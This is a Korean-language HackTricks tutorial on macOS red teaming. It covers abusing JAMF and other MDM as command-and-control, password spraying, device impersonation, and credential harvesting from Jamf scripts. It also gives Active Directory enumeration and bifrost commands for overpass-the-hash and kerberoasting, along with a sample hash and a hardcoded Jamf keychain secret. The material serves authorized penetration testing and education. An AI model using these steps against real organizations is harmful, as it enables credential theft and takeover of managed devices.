macOS Red Teaming

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

MDM ์•…์šฉ

  • JAMF Pro: jamf checkJSSConnection
  • Kandji

๊ด€๋ฆฌ ํ”Œ๋žซํผ์— ์ ‘๊ทผํ•˜๊ธฐ ์œ„ํ•ด ๊ด€๋ฆฌ์ž ์ž๊ฒฉ ์ฆ๋ช…์„ ํƒ€ํ˜‘ํ•˜๋Š” ๋ฐ ์„ฑ๊ณตํ•˜๋ฉด, ๊ธฐ๊ณ„์— ์•…์„ฑ ์ฝ”๋“œ๋ฅผ ๋ฐฐํฌํ•˜์—ฌ ๋ชจ๋“  ์ปดํ“จํ„ฐ๋ฅผ ํƒ€ํ˜‘ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

MacOS ํ™˜๊ฒฝ์—์„œ ๋ ˆ๋“œ ํŒ€ ํ™œ๋™์„ ํ•˜๋ ค๋ฉด MDM์ด ์–ด๋–ป๊ฒŒ ์ž‘๋™ํ•˜๋Š”์ง€์— ๋Œ€ํ•œ ์ดํ•ด๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค:

macOS MDM

MDM์„ C2๋กœ ์‚ฌ์šฉํ•˜๊ธฐ

MDM์€ ํ”„๋กœํ•„์„ ์„ค์น˜, ์ฟผ๋ฆฌ ๋˜๋Š” ์ œ๊ฑฐํ•˜๊ณ , ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์„ค์น˜ํ•˜๊ณ , ๋กœ์ปฌ ๊ด€๋ฆฌ์ž ๊ณ„์ •์„ ์ƒ์„ฑํ•˜๊ณ , ํŽŒ์›จ์–ด ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์„ค์ •ํ•˜๊ณ , FileVault ํ‚ค๋ฅผ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ์„ ๊ฐ€์ง‘๋‹ˆ๋‹คโ€ฆ

์ž์‹ ์˜ MDM์„ ์šด์˜ํ•˜๋ ค๋ฉด ๊ณต๊ธ‰์—…์ฒด์— ์˜ํ•ด ์„œ๋ช…๋œ CSR์ด ํ•„์š”ํ•˜๋ฉฐ, ์ด๋ฅผ https://mdmcert.download/์—์„œ ์–ป์œผ๋ ค๊ณ  ์‹œ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Apple ์žฅ์น˜์šฉ MDM์„ ์šด์˜ํ•˜๋ ค๋ฉด MicroMDM์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๊ทธ๋Ÿฌ๋‚˜ ๋“ฑ๋ก๋œ ์žฅ์น˜์— ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์„ค์น˜ํ•˜๋ ค๋ฉด ์—ฌ์ „ํžˆ ๊ฐœ๋ฐœ์ž ๊ณ„์ •์œผ๋กœ ์„œ๋ช…๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹คโ€ฆ ํ•˜์ง€๋งŒ MDM ๋“ฑ๋ก ์‹œ ์žฅ์น˜๊ฐ€ MDM์˜ SSL ์ธ์ฆ์„œ๋ฅผ ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” CA๋กœ ์ถ”๊ฐ€ํ•˜๋ฏ€๋กœ ์ด์ œ ๋ฌด์—‡์ด๋“  ์„œ๋ช…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์žฅ์น˜๋ฅผ MDM์— ๋“ฑ๋กํ•˜๋ ค๋ฉด mobileconfig ํŒŒ์ผ์„ ๋ฃจํŠธ๋กœ ์„ค์น˜ํ•ด์•ผ ํ•˜๋ฉฐ, ์ด๋Š” pkg ํŒŒ์ผ์„ ํ†ตํ•ด ์ „๋‹ฌ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค(์••์ถ•ํ•˜์—ฌ zip์œผ๋กœ ๋งŒ๋“ค๊ณ  Safari์—์„œ ๋‹ค์šด๋กœ๋“œํ•˜๋ฉด ์••์ถ•์ด ํ•ด์ œ๋ฉ๋‹ˆ๋‹ค).

Mythic agent Orthrus๋Š” ์ด ๊ธฐ์ˆ ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค.

JAMF PRO ์•…์šฉ

JAMF๋Š” ์‚ฌ์šฉ์ž ์ •์˜ ์Šคํฌ๋ฆฝํŠธ(์‹œ์Šคํ…œ ๊ด€๋ฆฌ์ž๊ฐ€ ๊ฐœ๋ฐœํ•œ ์Šคํฌ๋ฆฝํŠธ), ๋„ค์ดํ‹ฐ๋ธŒ ํŽ˜์ด๋กœ๋“œ(๋กœ์ปฌ ๊ณ„์ • ์ƒ์„ฑ, EFI ๋น„๋ฐ€๋ฒˆํ˜ธ ์„ค์ •, ํŒŒ์ผ/ํ”„๋กœ์„ธ์Šค ๋ชจ๋‹ˆํ„ฐ๋งโ€ฆ) ๋ฐ MDM(์žฅ์น˜ ๊ตฌ์„ฑ, ์žฅ์น˜ ์ธ์ฆ์„œโ€ฆ)๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

JAMF ์ž์ฒด ๋“ฑ๋ก

https://<ํšŒ์‚ฌ ์ด๋ฆ„>.jamfcloud.com/enroll/์™€ ๊ฐ™์€ ํŽ˜์ด์ง€๋กœ ๊ฐ€์„œ ์ž์ฒด ๋“ฑ๋ก์ด ํ™œ์„ฑํ™”๋˜์–ด ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค. ํ™œ์„ฑํ™”๋˜์–ด ์žˆ๋‹ค๋ฉด ์ ‘๊ทผ์„ ์œ„ํ•œ ์ž๊ฒฉ ์ฆ๋ช…์„ ์š”์ฒญํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์Šคํฌ๋ฆฝํŠธ JamfSniper.py๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋น„๋ฐ€๋ฒˆํ˜ธ ์Šคํ”„๋ ˆ์ด ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋˜ํ•œ, ์ ์ ˆํ•œ ์ž๊ฒฉ ์ฆ๋ช…์„ ์ฐพ์€ ํ›„ ๋‹ค์Œ ์–‘์‹์„ ์‚ฌ์šฉํ•˜์—ฌ ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž ์ด๋ฆ„์„ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

JAMF ์žฅ์น˜ ์ธ์ฆ

jamf ๋ฐ”์ด๋„ˆ๋ฆฌ๋Š” ํ‚ค์ฒด์ธ์„ ์—ฌ๋Š” ๋น„๋ฐ€์„ ํฌํ•จํ•˜๊ณ  ์žˆ์œผ๋ฉฐ, ๋ฐœ๊ฒฌ ๋‹น์‹œ ๋ชจ๋“  ์‚ฌ๋žŒ๊ณผ ๊ณต์œ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค: jk23ucnq91jfu9aj.
๋˜ํ•œ, jamf๋Š” **/Library/LaunchAgents/com.jamf.management.agent.plist**์— LaunchDaemon์œผ๋กœ ์ง€์†๋ฉ๋‹ˆ๋‹ค.

JAMF ์žฅ์น˜ ์ธ์ˆ˜

JSS (Jamf Software Server) URL์€ **jamf**๊ฐ€ ์‚ฌ์šฉํ•  **/Library/Preferences/com.jamfsoftware.jamf.plist**์— ์œ„์น˜ํ•ฉ๋‹ˆ๋‹ค.
์ด ํŒŒ์ผ์€ ๊ธฐ๋ณธ์ ์œผ๋กœ URL์„ ํฌํ•จํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค:

plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist

[...]
<key>is_virtual_machine</key>
<false/>
<key>jss_url</key>
<string>https://subdomain-company.jamfcloud.com/</string>
<key>last_management_framework_change_id</key>
<integer>4</integer>
[...]

๋”ฐ๋ผ์„œ ๊ณต๊ฒฉ์ž๋Š” ์„ค์น˜ ์‹œ ์ด ํŒŒ์ผ์„ ๋ฎ์–ด์“ฐ๋Š” ์•…์„ฑ ํŒจํ‚ค์ง€(pkg)๋ฅผ ๋ฐฐํฌํ•˜์—ฌ Typhon ์—์ด์ „ํŠธ์˜ Mythic C2 ๋ฆฌ์Šค๋„ˆ์— ๋Œ€ํ•œ URL์„ ์„ค์ •ํ•˜์—ฌ JAMF๋ฅผ C2๋กœ ์•…์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

# After changing the URL you could wait for it to be reloaded or execute:
sudo jamf policy -id 0

# TODO: There is an ID, maybe it's possible to have the real jamf connection and another one to the C2

JAMF ์‚ฌ์นญ

์žฅ์น˜์™€ JMF ๊ฐ„์˜ ํ†ต์‹ ์„ ์‚ฌ์นญํ•˜๋ ค๋ฉด ๋‹ค์Œ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค:

  • ์žฅ์น˜์˜ UUID: ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'
  • ์žฅ์น˜ ์ธ์ฆ์„œ๋ฅผ ํฌํ•จํ•˜๋Š” JAMF ํ‚ค์ฒด์ธ: /Library/Application\ Support/Jamf/JAMF.keychain

์ด ์ •๋ณด๋ฅผ ๋ฐ”ํƒ•์œผ๋กœ, ๋„๋‚œ๋‹นํ•œ ํ•˜๋“œ์›จ์–ด UUID์™€ SIP ๋น„ํ™œ์„ฑํ™”๋œ VM์„ ์ƒ์„ฑํ•˜๊ณ , JAMF ํ‚ค์ฒด์ธ์„ ๋“œ๋กญํ•œ ํ›„, Jamf ์—์ด์ „ํŠธ๋ฅผ ํ›…ํ•˜์—ฌ ์ •๋ณด๋ฅผ ํ›”์น˜์„ธ์š”.

๋น„๋ฐ€ ์ •๋ณด ํ›”์น˜๊ธฐ

a

๋˜ํ•œ /Library/Application Support/Jamf/tmp/ ์œ„์น˜๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜์—ฌ ๊ด€๋ฆฌ์ž๊ฐ€ Jamf๋ฅผ ํ†ตํ•ด ์‹คํ–‰ํ•˜๊ณ ์ž ํ•˜๋Š” ์‚ฌ์šฉ์ž ์ •์˜ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ์Šคํฌ๋ฆฝํŠธ๋Š” ์—ฌ๊ธฐ์— ๋ฐฐ์น˜๋˜๊ณ  ์‹คํ–‰๋œ ํ›„ ์ œ๊ฑฐ๋ฉ๋‹ˆ๋‹ค. ์ด ์Šคํฌ๋ฆฝํŠธ๋Š” ์ž๊ฒฉ ์ฆ๋ช…์„ ํฌํ•จํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๊ทธ๋Ÿฌ๋‚˜ ์ž๊ฒฉ ์ฆ๋ช…์€ ์ด๋Ÿฌํ•œ ์Šคํฌ๋ฆฝํŠธ์— ๋งค๊ฐœ๋ณ€์ˆ˜๋กœ ์ „๋‹ฌ๋  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ, ps aux | grep -i jamf๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค (๋ฃจํŠธ ๊ถŒํ•œ ์—†์ด๋„ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค).

์Šคํฌ๋ฆฝํŠธ JamfExplorer.py๋Š” ์ƒˆ ํŒŒ์ผ์ด ์ถ”๊ฐ€๋˜๊ฑฐ๋‚˜ ์ƒˆ๋กœ์šด ํ”„๋กœ์„ธ์Šค ์ธ์ˆ˜๊ฐ€ ์ƒ๊ธฐ๋Š” ๊ฒƒ์„ ๊ฐ์ง€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

macOS ์›๊ฒฉ ์•ก์„ธ์Šค

๋˜ํ•œ MacOS์˜ โ€œํŠน๋ณ„ํ•œโ€ ๋„คํŠธ์›Œํฌ ํ”„๋กœํ† ์ฝœ์— ๋Œ€ํ•ด:

macOS Network Services & Protocols

Active Directory

์ผ๋ถ€ ๊ฒฝ์šฐ MacOS ์ปดํ“จํ„ฐ๊ฐ€ AD์— ์—ฐ๊ฒฐ๋˜์–ด ์žˆ๋Š” ๊ฒƒ์„ ๋ฐœ๊ฒฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ์‹œ๋‚˜๋ฆฌ์˜ค์—์„œ๋Š” ์ต์ˆ™ํ•œ ๋Œ€๋กœ ์•กํ‹ฐ๋ธŒ ๋””๋ ‰ํ† ๋ฆฌ๋ฅผ ์—ด๊ฑฐํ•˜๋ ค๊ณ  ์‹œ๋„ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ๋‹ค์Œ ํŽ˜์ด์ง€์—์„œ ๋„์›€์„ ์ฐพ์œผ์„ธ์š”:

389, 636, 3268, 3269 - Pentesting LDAP

Active Directory Methodology

88tcp/udp - Pentesting Kerberos

๋„์›€์ด ๋  ์ˆ˜ ์žˆ๋Š” ๋กœ์ปฌ MacOS ๋„๊ตฌ๋Š” dscl์ž…๋‹ˆ๋‹ค:

dscl "/Active Directory/[Domain]/All Domains" ls /

๋˜ํ•œ MacOS์—์„œ AD๋ฅผ ์ž๋™์œผ๋กœ ์—ด๊ฑฐํ•˜๊ณ  kerberos์™€ ์ƒํ˜ธ์ž‘์šฉํ•  ์ˆ˜ ์žˆ๋„๋ก ์ค€๋น„๋œ ๋„๊ตฌ๋“ค์ด ์žˆ์Šต๋‹ˆ๋‹ค:

  • Machound: MacHound๋Š” MacOS ํ˜ธ์ŠคํŠธ์—์„œ Active Directory ๊ด€๊ณ„๋ฅผ ์ˆ˜์ง‘ํ•˜๊ณ  ์ˆ˜์ง‘ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” Bloodhound ๊ฐ์‚ฌ ๋„๊ตฌ์˜ ํ™•์žฅ์ž…๋‹ˆ๋‹ค.
  • Bifrost: Bifrost๋Š” macOS์—์„œ Heimdal krb5 API์™€ ์ƒํ˜ธ์ž‘์šฉํ•˜๋„๋ก ์„ค๊ณ„๋œ Objective-C ํ”„๋กœ์ ํŠธ์ž…๋‹ˆ๋‹ค. ์ด ํ”„๋กœ์ ํŠธ์˜ ๋ชฉํ‘œ๋Š” ํƒ€๊ฒŸ์— ๋‹ค๋ฅธ ํ”„๋ ˆ์ž„์›Œํฌ๋‚˜ ํŒจํ‚ค์ง€๋ฅผ ์š”๊ตฌํ•˜์ง€ ์•Š๊ณ  ๋„ค์ดํ‹ฐ๋ธŒ API๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ macOS ์žฅ์น˜์—์„œ Kerberos์— ๋Œ€ํ•œ ๋ณด์•ˆ ํ…Œ์ŠคํŠธ๋ฅผ ๊ฐœ์„ ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.
  • Orchard: Active Directory ์—ด๊ฑฐ๋ฅผ ์ˆ˜ํ–‰ํ•˜๊ธฐ ์œ„ํ•œ JavaScript for Automation (JXA) ๋„๊ตฌ์ž…๋‹ˆ๋‹ค.

๋„๋ฉ”์ธ ์ •๋ณด

echo show com.apple.opendirectoryd.ActiveDirectory | scutil

์‚ฌ์šฉ์ž

MacOS ์‚ฌ์šฉ์ž ์œ ํ˜•์€ ์„ธ ๊ฐ€์ง€์ž…๋‹ˆ๋‹ค:

  • ๋กœ์ปฌ ์‚ฌ์šฉ์ž โ€” ๋กœ์ปฌ OpenDirectory ์„œ๋น„์Šค์— ์˜ํ•ด ๊ด€๋ฆฌ๋˜๋ฉฐ, Active Directory์™€๋Š” ์—ฐ๊ฒฐ๋˜์–ด ์žˆ์ง€ ์•Š์Šต๋‹ˆ๋‹ค.
  • ๋„คํŠธ์›Œํฌ ์‚ฌ์šฉ์ž โ€” DC ์„œ๋ฒ„์— ์—ฐ๊ฒฐํ•˜์—ฌ ์ธ์ฆ์ด ํ•„์š”ํ•œ ๋ณ€๋™์„ฑ Active Directory ์‚ฌ์šฉ์ž์ž…๋‹ˆ๋‹ค.
  • ๋ชจ๋ฐ”์ผ ์‚ฌ์šฉ์ž โ€” ์ž๊ฒฉ ์ฆ๋ช… ๋ฐ ํŒŒ์ผ์— ๋Œ€ํ•œ ๋กœ์ปฌ ๋ฐฑ์—…์ด ์žˆ๋Š” Active Directory ์‚ฌ์šฉ์ž์ž…๋‹ˆ๋‹ค.

์‚ฌ์šฉ์ž ๋ฐ ๊ทธ๋ฃน์— ๋Œ€ํ•œ ๋กœ์ปฌ ์ •๋ณด๋Š” /var/db/dslocal/nodes/Default ํด๋”์— ์ €์žฅ๋ฉ๋‹ˆ๋‹ค.
์˜ˆ๋ฅผ ๋“ค์–ด, _mark_๋ผ๋Š” ์‚ฌ์šฉ์ž์— ๋Œ€ํ•œ ์ •๋ณด๋Š” _/var/db/dslocal/nodes/Default/users/mark.plist_์— ์ €์žฅ๋˜๋ฉฐ, admin ๊ทธ๋ฃน์— ๋Œ€ํ•œ ์ •๋ณด๋Š” _/var/db/dslocal/nodes/Default/groups/admin.plist_์— ์žˆ์Šต๋‹ˆ๋‹ค.

HasSession ๋ฐ AdminTo ์—ฃ์ง€๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ ์™ธ์—๋„, MacHound๋Š” Bloodhound ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์— ์„ธ ๊ฐ€์ง€ ์ƒˆ๋กœ์šด ์—ฃ์ง€๋ฅผ ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค:

  • CanSSH - ํ˜ธ์ŠคํŠธ์— SSHํ•  ์ˆ˜ ์žˆ๋Š” ์—”ํ‹ฐํ‹ฐ
  • CanVNC - ํ˜ธ์ŠคํŠธ์— VNCํ•  ์ˆ˜ ์žˆ๋Š” ์—”ํ‹ฐํ‹ฐ
  • CanAE - ํ˜ธ์ŠคํŠธ์—์„œ AppleEvent ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ์—”ํ‹ฐํ‹ฐ
#User enumeration
dscl . ls /Users
dscl . read /Users/[username]
dscl "/Active Directory/TEST/All Domains" ls /Users
dscl "/Active Directory/TEST/All Domains" read /Users/[username]
dscacheutil -q user

#Computer enumeration
dscl "/Active Directory/TEST/All Domains" ls /Computers
dscl "/Active Directory/TEST/All Domains" read "/Computers/[compname]$"

#Group enumeration
dscl . ls /Groups
dscl . read "/Groups/[groupname]"
dscl "/Active Directory/TEST/All Domains" ls /Groups
dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]"

#Domain Information
dsconfigad -show

๋” ๋งŽ์€ ์ •๋ณด๋Š” https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/์—์„œ ํ™•์ธํ•˜์„ธ์š”.

Computer$ ๋น„๋ฐ€๋ฒˆํ˜ธ

๋‹ค์Œ ๋ฐฉ๋ฒ•์œผ๋กœ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค:

bifrost --action askhash --username [name] --password [password] --domain [domain]

Computer$ ๋น„๋ฐ€๋ฒˆํ˜ธ์— ์‹œ์Šคํ…œ ํ‚ค์ฒด์ธ์—์„œ ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Over-Pass-The-Hash

ํŠน์ • ์‚ฌ์šฉ์ž ๋ฐ ์„œ๋น„์Šค์— ๋Œ€ํ•œ TGT๋ฅผ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค:

bifrost --action asktgt --username [user] --domain [domain.com] \
--hash [hash] --enctype [enctype] --keytab [/path/to/keytab]

TGT๊ฐ€ ์ˆ˜์ง‘๋˜๋ฉด, ํ˜„์žฌ ์„ธ์…˜์— ์ฃผ์ž…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

bifrost --action asktgt --username test_lab_admin \
--hash CF59D3256B62EE655F6430B0F80701EE05A0885B8B52E9C2480154AFA62E78 \
--enctype aes256 --domain test.lab.local

Kerberoasting

bifrost --action asktgs --spn [service] --domain [domain.com] \
--username [user] --hash [hash] --enctype [enctype]

ํš๋“ํ•œ ์„œ๋น„์Šค ํ‹ฐ์ผ“์„ ์‚ฌ์šฉํ•˜์—ฌ ๋‹ค๋ฅธ ์ปดํ“จํ„ฐ์˜ ๊ณต์œ ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

smbutil view //computer.fqdn
mount -t smbfs //server/folder /local/mount/point

Keychain ์ ‘๊ทผํ•˜๊ธฐ

Keychain์€ ํ”„๋กฌํ”„ํŠธ๋ฅผ ์ƒ์„ฑํ•˜์ง€ ์•Š๊ณ  ์ ‘๊ทผํ•  ๊ฒฝ์šฐ, ๋ ˆ๋“œ ํŒ€ ์—ฐ์Šต์„ ์ง„ํ–‰ํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋  ์ˆ˜ ์žˆ๋Š” ๋ฏผ๊ฐํ•œ ์ •๋ณด๋ฅผ ํฌํ•จํ•˜๊ณ  ์žˆ์„ ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค:

macOS Keychain

์™ธ๋ถ€ ์„œ๋น„์Šค

MacOS ๋ ˆ๋“œ ํŒ€์€ ์ผ๋ฐ˜์ ์ธ Windows ๋ ˆ๋“œ ํŒ€๊ณผ ๋‹ค๋ฆ…๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ MacOS๋Š” ์—ฌ๋Ÿฌ ์™ธ๋ถ€ ํ”Œ๋žซํผ๊ณผ ์ง์ ‘ ํ†ตํ•ฉ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. MacOS์˜ ์ผ๋ฐ˜์ ์ธ ๊ตฌ์„ฑ์€ OneLogin ๋™๊ธฐํ™” ์ž๊ฒฉ ์ฆ๋ช…์„ ์‚ฌ์šฉํ•˜์—ฌ ์ปดํ“จํ„ฐ์— ์ ‘๊ทผํ•˜๊ณ , OneLogin์„ ํ†ตํ•ด ์—ฌ๋Ÿฌ ์™ธ๋ถ€ ์„œ๋น„์Šค(์˜ˆ: github, awsโ€ฆ)์— ์ ‘๊ทผํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

๊ธฐํƒ€ ๋ ˆ๋“œ ํŒ€ ๊ธฐ์ˆ 

Safari

Safari์—์„œ ํŒŒ์ผ์ด ๋‹ค์šด๋กœ๋“œ๋  ๋•Œ, โ€œ์•ˆ์ „ํ•œโ€ ํŒŒ์ผ์ด๋ผ๋ฉด ์ž๋™์œผ๋กœ ์—ด๋ฆฝ๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, zip ํŒŒ์ผ์„ ๋‹ค์šด๋กœ๋“œํ•˜๋ฉด ์ž๋™์œผ๋กœ ์••์ถ•์ด ํ•ด์ œ๋ฉ๋‹ˆ๋‹ค:

์ฐธ๊ณ ์ž๋ฃŒ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ